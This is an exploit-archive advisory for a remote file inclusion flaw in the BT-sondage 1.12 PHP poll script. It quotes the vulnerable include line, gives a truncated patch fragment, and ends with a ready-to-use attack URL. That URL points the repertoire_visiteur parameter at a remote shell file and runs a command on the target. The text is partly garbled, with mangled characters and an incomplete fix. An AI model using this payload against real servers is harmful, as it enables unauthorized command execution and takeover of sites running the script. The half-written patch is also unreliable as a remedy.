BT-sondage 1.12 (gestion_sondage.php) RFI Vulnerability

2007-04-01T00:00:00
ID 1337DAY-ID-1682
Type zdt
Reporter Crackers_Child
Modified 2007-04-01T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================
BT-sondage 1.12 (gestion_sondage.php) RFI Vulnerability
=======================================================




--------------------------------------------------------------------------------


Title : BT-Sondage-v112 Remote File Include Vulnerability

--------------------------------------------------------------------------------

#Author: Crackers_Child


--------------------------------------------------------------------------------

Affected software description :
--------------------------------------------------------------------------------

Application :  BT-Sondage

--------------------------------------------------------------------------------


dork        : Download Script :)
Exploit     :

--------------------------------------------------------------------------------

Vulnerable Codes .n gestion_sondage.php


include($repertoire_visiteur.'utilitaires/affichage_formulaire.php');

For Patch .t add

if ( !defined( "_GESTION_SONDAGE_PHP" ) )
{

--------------------------------------------------------------------------------


Usage:

http://[target]/[sondage_path]/utilitaires/gestion_sondage.php?repertoire_visiteur=Shell.txt?&cmd=ls


--------------------------------------------------------------------------------

greets: EveryBody :=)

--------------------------------------------------------------------------------

Note : Melek Bir Yandan .eytan Bir Yandan Bas.m Zindan Yardim Et Allah'.m Yardim :(

--------------------------------------------------------------------------------



#  0day.today [2018-04-10]  #